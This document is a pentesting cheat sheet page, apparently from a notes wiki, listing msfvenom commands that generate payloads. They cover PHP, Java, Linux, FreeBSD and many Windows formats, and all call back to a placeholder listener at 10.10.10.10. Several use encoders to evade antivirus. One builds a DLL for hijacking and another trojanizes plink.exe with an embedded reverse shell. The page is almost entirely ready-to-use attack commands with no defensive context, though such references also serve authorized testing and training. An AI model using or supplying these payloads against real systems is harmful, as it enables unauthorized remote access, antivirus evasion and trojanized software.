Msfvenom Payloads

Payload creation using msfvenom

PHP Reverse Shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=53 -f raw -o shell.php

Java War Reverse Shell

msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f war -o shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f war -o shell.war

Linux Bind Shell

msfvenom -p linux/x86/shell_bind_tcp LPORT=53 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Linux Binary

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f elf -o shell.elf
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

FreeBSD Reverse Shell

msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f elf -o shell.elf

C Reverse Shell

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -e x86/shikata_ga_nai -f c

Windows Non-Staged Reverse Shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -e x86/shikata_ga_nai -f exe -o non_staged.exe

Windows Staged (Meterpreter) Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=53 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

Windows Staged (Meterpreter) PHP Reverse Shell

msfvenom -p php/meterpreter/reverse_tcp -f raw lhost=10.10.10.10 lport=443 -o pwn.php

Windows Python Reverse Shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 EXITFUNC=thread -f python -o shell.py

Windows ASP Reverse Shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f asp -e x86/shikata_ga_nai -o shell.asp

Windows ASPX Reverse Shell

msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -e x86/shikata_ga_nai -o shell.aspx

Windows Javascript Reverse Shell with NOPS

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f js_le -e generic/none -n 18

Windows Powershell Reverse Shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

Windows Reverse Shell excluding bad characters

msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=53 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

Windows x64 Reverse Shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o shell.exe

Windows x86 Reverse Shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o shell.exe

DLL Hijacking

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 –e x86/shikata_ga_nai -i 3 -f dll -o custom.dll

Windows Reverse Shell embedding into plink

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
PreviousMsfvenom tutorialNextReverse Shells

Last updated